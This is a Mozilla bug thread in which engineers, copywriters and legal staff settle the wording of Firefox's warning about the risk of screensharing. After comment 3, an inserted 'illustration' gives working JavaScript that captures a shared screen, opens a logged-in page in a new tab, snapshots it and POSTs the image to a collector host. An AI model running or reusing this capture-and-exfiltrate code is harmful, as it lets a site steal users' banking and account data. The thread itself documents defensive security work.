Closed Bug 1280403 Opened 8 years ago Closed 8 years ago

[copy] screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen

Categories

(Core :: WebRTC: Audio/Video, defect, P1)

RESOLVED FIXED

People

(Reporter: shell, Assigned: mheubusch)

References

Details

(Whiteboard: [copy needed] screensharing)

Attachments

(1 file)

screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen. A proposal from Privacy and WebRTC folks is below (Tanvi, mt, jesup, mreavy). Does matej or someone from copy have suggestions to make this more clear while still conveying the risk? The technical implementation of the UX is starting. The string is the only blocking item. A time-sensitive priority.

Proposal: Sharing (Firefox|Screens) could give this site access to all your online data. With a Learn More link somewhere.

UX change: Icon shown on drop-down list for firefox and screen - to differentiate, and again before the warning string.

UX (click on Firefox): https://mozilla.invisionapp.com/share/AF71R266U#/screens/152779760

String discussion: https://public.etherpad-mozilla.org/p/screensharingcopy

Historical summary of the problem and related bugs: https://docs.google.com/document/d/1-pshtAWrZgkF4Nu16hrspVYpXoKwo5hsybqpKE05H8E/edit#
Flags: needinfo?(matej)
Summary: [copy bug] screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen → [copy] screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen
Rank: 10
Flagging Michelle to have a look at this.
Flags: needinfo?(matej) → needinfo?(mheubusch)
(In reply to Matej Novak [:matej] from comment #1)
> Flagging Michelle to have a look at this.

Here is my recommendation:

Sharing (Firefox | Screens) may expose your personal information. Learn more about this risk

Here is my rationale. If I have misunderstood the functionality, please reach out so we can discuss: IIUC, sharing a screen will allow that site to "see" and even "snapshot" what happens during the share and any information that is viewed, even if only for a second (e.g., I click on a link to open an email and my entire gmail inbox opens and shows all of the emails in the inbox and I close it immediately, but the screen shot already happened, so in theory someone could take a screen grab of the session and have a list of all the people/companies I've rec'd emails from.) So they will witness everything you do, but they only *may* access your personal information if you display it through your browsing. The other party to the screen share does not gain control of your system, correct? Or can't place malware on your device to access passwords or keystrokes, correct? If so, I want to communicate that there are risks and am using the word "expose" because I think it connotes something more revealing than the "display" recommendation.
Flags: needinfo?(mheubusch)
No, the risk is so much worse. That's why this wording is so hard, because people with *some* technical understanding, get the risk all wrong. The site can't merely see where you drive, to use a car analogy, you're handing the keys to the site. Once the site can see your screen, it no longer needs you. As long as a visible tab is visiting it, the site can now jump to URLs as if it were you - the logged in you - quickly see the rendered results, grab it, and send it, before you can say "wha...". For instance, it could open: https://secure.bankofamerica.com/myaccounts/banking/overview and if you happened to be (always) logged in to one of the largest banks in the world, it could snap your actual account information. Screensharing effectively does an end-run around cross origin protections.
Combined with camera access, this is quite powerful, since it can wait to do this until it sees you're not looking.
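The threat described in comment 3, as an added illustration for this thread (not code from the bug, from Firefox, or from any of the participants): a page that has been granted a capture of the whole screen or of the Firefox window opens a cross-origin page in a new tab, waits for it to render on the shared surface, copies the frame out of its own MediaStream and ships it off. The same mechanism answers the later question in this thread about how a site could act in other tabs: it does not need to click anything, it only needs to open a URL while the share is running. The target and collector URLs, the settle timing and the pixel-change threshold are placeholders; the capture API used is getDisplayMedia, the modern form of the getUserMedia mediaSource constraint Firefox used at the time.

```javascript
// Added illustration of the comment 3 threat. Everything here is constructed
// for this thread; the URLs and timings below are placeholders, not real endpoints.

const SETTLE_MS = 1500;         // time allowed for the victim tab to render (assumption)
const CHANGE_THRESHOLD = 0.02;  // fraction of pixels that must change to call a frame "new"

// Fraction of pixels whose RGB values differ between two RGBA frames of equal size.
// Pure helper so the "has the target page rendered yet?" step can be exercised
// outside a browser.
function fractionChanged(prev, next, perChannelTolerance = 8) {
  if (prev.length !== next.length || prev.length % 4 !== 0) {
    throw new RangeError('frames must be RGBA buffers of identical size');
  }
  const pixels = prev.length / 4;
  let changed = 0;
  for (let i = 0; i < prev.length; i += 4) {
    if (Math.abs(prev[i] - next[i]) > perChannelTolerance ||
        Math.abs(prev[i + 1] - next[i + 1]) > perChannelTolerance ||
        Math.abs(prev[i + 2] - next[i + 2]) > perChannelTolerance) {
      changed++;
    }
  }
  return pixels === 0 ? 0 : changed / pixels;
}

// True when the shared surface has visibly changed since the baseline frame.
function frameLooksRendered(baseline, current, threshold = CHANGE_THRESHOLD) {
  return fractionChanged(baseline, current) >= threshold;
}

// --- Browser-only part (never executed at load time) -------------------------

// Draw the current frame of the screen/window MediaStream into a canvas and
// return its RGBA pixels plus a PNG data URL. toDataURL() succeeds because the
// canvas is not origin-tainted: the pixels come from the user's own capture,
// not from a cross-origin image fetch. This is the end-run around cross-origin
// protections that comment 3 describes.
function snapshot(video, canvas) {
  canvas.width = video.videoWidth;
  canvas.height = video.videoHeight;
  const ctx = canvas.getContext('2d');
  ctx.drawImage(video, 0, 0);
  return {
    pixels: ctx.getImageData(0, 0, canvas.width, canvas.height).data,
    png: canvas.toDataURL('image/png'),
  };
}

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// With the share running: open a page the user is logged in to, wait for it to
// appear on the shared screen/window, grab the frame, close the tab, exfiltrate.
// Returns true if a frame was captured and sent.
async function grabCrossOriginPage(stream, targetUrl, collectorUrl) {
  const video = document.createElement('video');
  video.srcObject = stream;
  video.muted = true;
  await video.play();
  const canvas = document.createElement('canvas');

  const baseline = snapshot(video, canvas).pixels;
  const victimTab = window.open(targetUrl, '_blank'); // renders inside the shared surface
  let shot = null;
  for (let waited = 0; waited < SETTLE_MS * 4; waited += 250) {
    await sleep(250);
    const current = snapshot(video, canvas);
    if (frameLooksRendered(baseline, current.pixels)) { shot = current.png; break; }
  }
  if (victimTab) victimTab.close();
  if (shot) {
    await fetch(collectorUrl, { method: 'POST', body: shot, mode: 'no-cors' });
  }
  return shot !== null;
}

// What a malicious page would bind to its "Share screen" button. Placeholder
// hosts under .invalid are used so this never reaches a real site.
async function startAttack() {
  const stream = await navigator.mediaDevices.getDisplayMedia({ video: true });
  return grabCrossOriginPage(stream,
                             'https://bank.example.invalid/overview',
                             'https://collector.example.invalid/upload');
}
```

The only permission the page ever asked for is the screen share; the rest follows from the user still having the page open, which is why the thread insists the warning must convey "acts as you" and not merely "sees your screen".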
Thank you for the explanation, Jan-Ivar. Makes sense. So we need to convey that it can both see what you are doing and also act as you. My reco:

Sharing (Firefox|Screens) could give this site access to your online accounts and personal information. Learn more about this risk

If that is too long, then just:

Sharing (Firefox|Screens) could give this site access to your online accounts and information. Learn more
Well, this sounds suitably terrifying, but I'm not sure it really is informed consent. How would a reasonable person go from this to knowing whether to click yes or no?
Hi Eric, I may have misunderstood the requirements (informed consent) for this message. I will follow up with you outside of this bug to discuss.
This is fine. It's concise, accurate, and terrifying. If that gives people pause, or even causes them to try to understand the risks, great. I expect though that it will more likely prompt a decision based on trust. I know that people are very bad at that, but ultimately, that's all we've got. For the record, when we discussed this the conclusion was that the baseline was installing a web extension or addon. This is close enough to that baseline. Informed consent is a dream. I imagine that we could study this and learn that some non-trivial proportion of people confronted with this message don't even read it. In other words, no matter what we do, we won't reach everyone.
As long as "Learn more about this risk" links to comment 3 or very similar, I'm ok with the last wording.
So Jan-Ivar, you raise a good point and one I forgot to ask sooner - where does the Learn more link? I assumed that there was a destination for this. Is there one or is one planned? If not, can you point to someone I could discuss with (someone on the SUMO team, perhaps)?
Given the severity of the risk, have we considered not offering this as a feature? Do the benefits and use cases outweigh what could potentially happen to a user if they don't understand what's at stake?
(In reply to Matej Novak [:matej] from comment #11)
> Given the severity of the risk, have we considered not offering this as a
> feature? Do the benefits and use cases outweigh what could potentially
> happen to a user if they don't understand what's at stake?

That's not viable. It's a critical feature for essentially every commercial videoconferencing system.
Also, we already offer it, the only question is under what conditions we allow it.
(In reply to mheubusch from comment #10)
> where does the Learn more link? I assumed that there was a destination for this.

I don't know. My understanding is we have the link to save space only. Personally, I'd prefer it expanded additional text a la comment 3 that is all local and in the browser already. Otherwise I fear users aren't going to bother, and back out before the remote page loads, as people are impatient (I know it's what I would do), and that would be bad here. That page in turn could have a link to a mozilla hosted page with full information if we wanted.
Hi Florian - I'm pretty new to bugzilla, so just checking in to make sure you don't still need anything from me. The copy I propose for this bug is:

Sharing (Firefox|Screens) could give this site access to your online accounts and personal information.

IIUC, there is no link to learn more. Please let me know if you need further info on this. I will also create a separate bug to have legal review this warning to make sure it's ok.
(In reply to mheubusch from comment #15)
> Hi Florian - I'm pretty new to bugzilla, so just checking in to make sure
> you don't still need anything from me. The copy I propose for this bug is:
>
> Sharing (Firefox|Screens) could give this site access to your online
> accounts and personal information.

Asking a couple questions to be completely sure I understand what you mean:

You are suggesting we use 2 different strings depending on whether a whole screen has been selected, or Firefox has been selected:

"Sharing Screens could give this site access to your online accounts and personal information." (is the capitalized S on 'Screens' intentional?)

"Sharing Firefox could give this site access to your online accounts and personal information." (I assume "Firefox" here is actually &brandShortName; ie. it will be replaced with 'Firefox' or 'Nightly' or 'FirefoxDeveloperEdition' depending on which kind of build the user is running?)

> IIUC, there is no link to learn more. Please let me know if you need
> further info on this. I will also create a separate bug to have legal review
> this warning to make sure it's ok.

The UX mockup at https://mozilla.invisionapp.com/share/AF71R266U#/screens/152779760 has no 'Learn more' link, so this is what I'm going to implement, unless I hear that we need such a link (I think a few people who commented on this bug would like us to have one). If we do add one, someone will need to figure out which text we display on the page that opens when clicking the link (in reply to comment 14: it could be a local about: page so that it displays immediately).
Thanks for asking, Florian.

Please lowercase the S in screens: Sharing screens could give this site access

Please use &brandShortName

I'll stay tuned to learn whether or not we will have a link to learn more. Do you know whose decision that is to make?
I think we should have a Learn More link where users could go if they care to read more about the issue. Bryan, does that sound okay to you?
Flags: needinfo?(bbell)
On second thought, I still worry users will read this and think the thread is comment 2, not comment 3. Would there be room to include the following:

Sharing (Firefox|Screens) could give this site access to your online accounts and personal information, by impersonating you.

What I hope the last three words help convey is that this isn't just dangerous territory where one can remain safe by taking only prudent actions; rather, a malicious site can actively take action on the user's behalf without their involvement, to steal information.
s/thread/threat/
I also hope this would pique people's interest enough to read more.
(In reply to Jan-Ivar Bruaroey [:jib] from comment #19)
> On second thought, I still worry users will read this and think the thread
> it comment 2, not comment 3.
>
> Would there be room to include the following:
>
> Sharing (Firefox|Screens) could give this site access to your online
> accounts
> and personal information, by impersonating you.

I think it's not really a matter of "room" but more of user attention. The longer the text, the less likely users are to actually read it before clicking the share button. I also don't really see a difference in meaning between "access your online accounts" and "impersonating you".
The string doesn't say "site may access your online account", it says "could give this site access to your online account". That's passive, and plays into the misconception of comment 2 that the user is in control. I agree with Michelle in comment 5 that we need to convey that it can both see what you are doing and also act as you, and the current text doesn't succeed at the latter IMHO.
Hi All - I've reached out to legal to weigh in on the best way to convey the risk, as well. I'll update this bug with what I get back. But also alerted legal to the conversation in this thread.
assigning to Michelle based on previous conversations with Matej that she will own the final copy. the discussion in London with Tanvi and Martin ether pad is below https://public.etherpad-mozilla.org/p/screensharingcopy
Assignee: nobody → mheubusch
Jan-Ivar, can you explain exactly how a screensharing extension can click on links in other tabs? As I understand it, screensharing extensions simply get an image of the screen. They could get the co-ordinates of a link in another tab, but there would be no way of actually forcing a click in another tab hosted on a different domain (unless there is some other vector that I'm not aware of, which is entirely possible). My preference would be to just make the ongoing screensharing notification more prominent. Perhaps say something like "Your screen is being shared with www.randomsite.com".
If the user is still pointed at the site, then the site can put whatever it wants on the screen at any time, from any origin. That people keep underestimating this threat is a reason for a stronger warning, not a weaker one.
Final messaging is in review with legal now. Think I'll have something appropriately strong approved soon.
(In reply to mheubusch from comment #28)
> Final messaging is in review with legal now. Think I'll have something
> appropriately strong approved soon.

Comment 28 looks like you wanted to get back to us here, has there been progress?
Flags: needinfo?(mheubusch)
A couple of us did an iteration on this. How about:

Sharing Firefox or Screens with a malicious site would let it actively browse as you and gather your online account and personal information!

?
(In reply to Jan-Ivar Bruaroey [:jib] from comment #30)
> A couple of us did an iteration on this. How about:
>
> Sharing Firefox or Screens with a malicious site would let it actively
> browse as you
> and gather your online account and personal information!

"actively browse" is both confusing and inaccurate I think. Also, "as you and gather your" is broken. That said, I'm not sure about what to say... Maybe "let it display and gather online account and personal information from other websites"
> also, "as you and gather your" is broken I'm sorry, I misread it (though that may mean it's not as clear as we'd like). The operative part is "browse as you" then "and gather ....". Perhaps a comma....
Hi - Sorry for any confusion - I thought the legal bug I initially filed for this was linked back to this item. For reference, it is https://bugzilla.mozilla.org/show_bug.cgi?id=1284971

The result of that bug is that the following language is approved by Elvin and Marshall:

Only share [Firefox|screens] with sites you trust. Sharing lets deceptive sites steal your identity and private data. Learn more
Flags: needinfo?(mheubusch)
(In reply to mheubusch from comment #33)
> Hi - Sorry for any confusion - I thought the legal bug I initially filed for
> this was linked back to this item. For reference, it is
> https://bugzilla.mozilla.org/show_bug.cgi?id=1284971

I can't access it (legal bugs are restricted by default), could you please cc me?

> The result of that bug is that the following language is approved by Elvin
> and Marshall: Only share [Firefox|screens] with sites you trust. Sharing
> lets deceptive sites steal your identity and private data. Learn more

So you want a 'learn more' link? What should it point to?
Flags: needinfo?(mheubusch)
(In reply to Florian Quèze [:florian] [:flo] from comment #34)
> > The result of that bug is that the following language is approved by Elvin
> > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing
> > lets deceptive sites steal your identity and private data. Learn more
>
> So you want a 'learn more' link? What should it point to?

More specifically, do we want this to point to a SUMO page, or to an about: page within the browser that would always be there even on restricted networks?
(In reply to Florian Quèze [:florian] [:flo] from comment #35)
> (In reply to Florian Quèze [:florian] [:flo] from comment #34)
> > > The result of that bug is that the following language is approved by Elvin
> > > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing
> > > lets deceptive sites steal your identity and private data. Learn more
> >
> > So you want a 'learn more' link? What should it point to?
>
> More specifically, do we want this to point to a SUMO page, or to an about:
> page within the browser that would always be there even on restricted
> networks?

We can actually go without the Learn more link. I will also follow up with Joni Savage to see if there is a plan for WebRTC info on the SUMO site. If/when there is I can put a new bug in to link to it.
Flags: needinfo?(mheubusch) → needinfo?(jsavage)
Thanks for following up with me, Michelle. We don't have plans for dedicated WebRTC content on SUMO yet, but we can get content up if anyone identifies a support-related need for it.
Flags: needinfo?(jsavage)
(In reply to mheubusch from comment #33)
> Hi - Sorry for any confusion - I thought the legal bug I initially filed for
> this was linked back to this item. For reference, it is
> https://bugzilla.mozilla.org/show_bug.cgi?id=1284971
>
> The result of that bug is that the following language is approved by Elvin
> and Marshall: Only share [Firefox|screens] with sites you trust. Sharing
> lets deceptive sites steal your identity and private data. Learn more

Could you cc me as well? This still sounds like someone thinks the risk is comment 2, when it is comment 3.
(In reply to Jan-Ivar Bruaroey [:jib] from comment #38)
> (In reply to mheubusch from comment #33)
> > Hi - Sorry for any confusion - I thought the legal bug I initially filed for
> > this was linked back to this item. For reference, it is
> > https://bugzilla.mozilla.org/show_bug.cgi?id=1284971
> >
> > The result of that bug is that the following language is approved by Elvin
> > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing
> > lets deceptive sites steal your identity and private data. Learn more
>
> Could you cc me as well? This still sounds like someone thinks the risk is
> comment 2, when it is comment 3.

Just shared. Can I propose what I think you want to see?

Only share [Firefox|screens] with sites you trust. Sharing can allow deceptive sites to browse as you and steal your private data. Learn more

The point here is while online they can "be" you. Let me know if I need to arrange another meeting with Legal and with Martin, Tanvi, and you.
Thanks Michelle, yes please, I like your copy, and it's just as short. It makes me want to Learn more. I think we need a message that both: 1. conveys the active threat of comment 3, and 2. cannot be misconstrued as the smaller threat in comment 2. I think the other copy still fails #2, because it's possible to steal the identity of a careless sharer solely through passive observation.
Flags: needinfo?(martin.thomson)
I think that the text in comment 39 works. Provided that it fits in the available space, including after translation into more verbose languages.
Flags: needinfo?(martin.thomson)
(In reply to Martin Thomson [:mt:] from comment #41)
> I think that the text in comment 39 works. Provided that it fits in the
> available space, including after translation into more verbose languages.

Thanks, Martin - can you help me understand next steps here? Do I need to reopen the legal bug? Do I need to NI flod or delphine for validation?
Flags: needinfo?(martin.thomson)
Excellent question, to which I don't really know the answer. I would say that this is probably ready to leave with Maire's team.
Flags: needinfo?(martin.thomson) → needinfo?(mreavy)
I would say next steps are (1) to check with Florian that the copy (from comment 39) will fit in the existing layout (probably requires talking with one of our l10n folks to ask for translations that are likely to be the longest -- like German) -- if it doesn't, we may need to ask UX for some tweaks to get it to fit, (2) reopen the legal bug and get Legal (Elvin or Jishnu) to bless the updated text. I think we should do (1) and (2) at the same time.

Florian -- Can you let us know if the new copy (from comment 39) will fit into the existing space? If I can help in any way (e.g. finding someone from l10n to translate the copy, etc), let me know.

Michelle -- Can you reopen the legal bug and ask if the new copy is acceptable to Legal? If I'm not cc'd on the legal bug, can you add me?

Thanks, everyone! I believe we're in the "homestretch" for landing all of this; we have a good shot of shipping this in Firefox 52 if we keep this prioritized high and stay focused. Please respond quickly if you're pinged with a question on this.
Flags: needinfo?(mreavy)
Flags: needinfo?(mheubusch)
Flags: needinfo?(florian)
(In reply to Maire Reavy [:mreavy] from comment #44)
> Florian -- Can you let us know if the new copy (from comment 39) will fit
> into the existing space? If I can help in any way (e.g. finding someone
> from l10n to translate the copy, etc), let me know.

I think it should be fine.

Note: The copy in comment 39 has "learn more" again, when comment 36 said we don't need it.
Flags: needinfo?(florian)
(In reply to Florian Quèze [:florian] [:flo] from comment #45)
> (In reply to Maire Reavy [:mreavy] from comment #44)
> > Florian -- Can you let us know if the new copy (from comment 39) will fit
> > into the existing space? If I can help in any way (e.g. finding someone
> > from l10n to translate the copy, etc), let me know.
>
> I think it should be fine.
>
> Note: The copy in comment 39 has "learn more" again, when comment 36 said we
> don't need it.

Good catch. Michelle -- to close the loop, can you clarify if the final copy will have "learn more" or any other link for the user to click on from the permission box?
There is not currently any copy to link to on SUMO. I think we should leave it off for now, and add it back once we determine what copy should appear on SUMO and when it will be live on the site. I will set up a meeting to discuss with Joni and will invite Maire to attend. Anyone else want/need to participate in that conversation?
Flags: needinfo?(mheubusch)
Thanks, Michelle. If you could invite Jan-Ivar, Martin, and Randell as optional attendees (so they know when and where it's happening if they are available), that should be sufficient. I assume we'll be discussing what copy/info we should put on SUMO?
Flags: needinfo?(mheubusch)
(In reply to Maire Reavy [:mreavy] from comment #48)
> Thanks, Michelle. If you could invite Jan-Ivar, Martin, and Randell as
> optional attendees (so they know when and where it's happening if they are
> available), that should be sufficient. I assume we'll be discussing what
> copy/info we should put on SUMO?

Yes, what copy we need as well as where it should go within the site, what tags are needed to surface it to users who are just looking via search, and who is responsible for writing, reviewing, and approving copy. Also to set expectations around timing.
Flags: needinfo?(mheubusch)
Hello Florian - Maire, Jan-Ivar, Randell and I just met with Joni Savage on the SUMO team to discuss the content a user will see when they select the Learn more link. SUMO will publish that article sometime during the Aurora 52 release cycle - probably by mid-November, but not in time for the November 7 release of 52 Aurora. Since we will have the article shortly after release, does it make sense to still include the Learn more link in the Aurora release so that the string is in place and localized for Beta and GA? Joni can supply the URL where the article will appear with the caveat that the article will not appear there for about a week or two. Please advise. Thanks! -Michelle
Flags: needinfo?(jsavage)
Flags: needinfo?(florian)
(In reply to mheubusch from comment #50)
> Hello Florian - Maire, Jan-Ivar, Randell and I just met with Joni Savage on
> the SUMO team to discuss the content a user will see when they select the
> Learn more link. SUMO will publish that article sometime during the Aurora
> 52 release cycle - probably by mid-November, but not in time for the
> November 7 release of 52 Aurora. Since we will have the article shortly
> after release, does it make sense to still include the Learn more link in
> the Aurora release so that the string is in place and localized for Beta and
> GA? Joni can supply the URL where the article will appear with the caveat
> that the article will not appear there for about a week or two.

Yes, if we want the Learn more link, we should include it before November 7. Having the URL where the article will appear is useful. And it would be nice if that URL could point to a placeholder page with a 2-3 line text rather than a 404.
Flags: needinfo?(florian)
Hi Florian, here's a placeholder link you can use: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/screenshare-safety (Just replace the version/os/locale tuple) I'll have a placeholder page up in a few seconds so it's not showing a 404. We'll have real content up around mid-November as Michelle mentioned.
Flags: needinfo?(jsavage)
QA Update

I observe the Warning Message, however it does not appear consistently. Please reference attached screenshot.

In Talky.io choose Screen Sharing. The drop-down displays:

Talky: Select to share the Skype window
- there is appropriate window preview
- there is no Warning Message

Talky: Select to share the Talky Nightly
- there is appropriate window preview
- there is a Warning Message

Need Confirmation: Should the message only appear for Firefox windows?
Flags: needinfo?(sescalante)
Flags: needinfo?(florian)
(In reply to Michelle Funches - QA from comment #53)
> Need Confirmation: Should the message only appear for Firefox windows?

The message should appear for windows of the same Firefox process (ie. it won't appear if you attempt to share a Firefox window of Firefox started on another profile), or for entire screens.
Flags: needinfo?(florian)
We have the copy and will have a SUMO article up. Currently it is identical to the blog post on our WebRTC platform blog: https://blog.mozilla.org/webrtc/share-browser-windows-entire-screen-sites-trust/, but Joni will be tailoring it for a less technical audience before Fx52 goes to Beta.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Flags: needinfo?(sescalante)
Flags: needinfo?(bbell)
